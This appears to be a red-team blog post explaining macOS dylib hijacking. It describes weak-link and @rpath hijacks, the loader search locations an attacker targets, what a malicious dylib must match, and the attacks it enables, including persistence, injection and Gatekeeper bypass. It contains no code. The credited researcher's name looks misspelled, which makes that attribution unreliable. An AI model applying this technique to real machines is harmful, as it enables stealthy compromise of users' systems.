dylib expands to dynamic library in MacOS world. These are similar to Dynamic Linked Library (DLL) in Windows and Shared Object (so) in Linux.

Conceptually, dylib hijacking works in a similar way as DLL search-order hijacking. Upon executing an application, the loader searches for the required libraries in predefined locations in a specific order and loads them. If a red team operator can place a malicious library file at one of these locations, it will be loaded and executed in the context of the application loading them. The path selected to drop the malicious library file must be earlier in the search order before the application gets to the genuine library file.

There are two ways to implement dylib hijacking in MacOS:

• Hijacking weak-link dylibs - Weak-link dylibs mean that they do not have to be present at runtime for a process to continue running. If a weakly linked dylib is not present, the application can continue to run as long as it does not reference that library. However, if the dylib is present, the application can use it normally. So, if a genuine weak-link dylib is not present, a red team operator can drop one at a path in the search order or they can replace a genuine one with malicious one.

• Hijacking run path dependent dylibs - A run-path dependent library is a dependent library whose complete install path is not known when the library is created. The path for these libraries begins with a special keyword @rpath which gets replaced by an actual path during the runtime. The loader searches the following locations to resolve these libraries:

  • /Applications/Sample.app/Library/sample.dylib

  • /System/Library/sample.dylib

  • Predefined paths configured within the application itself. These paths are different for different applications and therefore, inconvenient from exploitation perspective.

  A red team operator can drop a malicious dylib at either of the first two locations to hijack the dylib. Again, earlier in the search order the better the chances are of the hijack being successful.

The following conditions must be met in order to hijack any dylib:

• The version of the malicious dylib should be set to same as the version referenced within the application.

• The malicious dylib should export the symbols exported by the genuine dylib.

Patrick Waddle, the researcher who discovered this technique, has created tools to automate the discovery of applications vulnerable to dylib hijack and creating a compatible hijacker dylib.

Red Team Notes
- dylib hijacking in MacOS is similar to DLL search order hijacking in Windows.
- This technique can be performed by hijacking weak-link dylibs or hijacking run path dependent dylibs.
- It abuses legitimate system functionality, does not require any binary or operating system file modification and is hosted in a trusted process.
- Fun fact - Patrick Waddle is the author of books The Art of Mac Malware Vol 1 and The Art of Mac Malware Vol 2. 

Follow my journey of 100 Days of Red Team on WhatsApp or Discord.

The dylib hijacking technique abuses legitimate system functionality, does not require any binary or operating system file modification and is hosted in a trusted process. It can be used for following attacks:

• Persistence

• Process Injection

• Bypassing Personal Security Products

• Remote Attacks (bypassing Gatekeeper)

If you want to dive deep into the technical details of how dylib hijacking works, and how to safeguard against it, below is the recording of a presentation, DLL Hijacking on OS X by Patrick Waddle, presented at DEF CON 23 2015. Patrick has also published a detailed paper about this technique. You can read it here.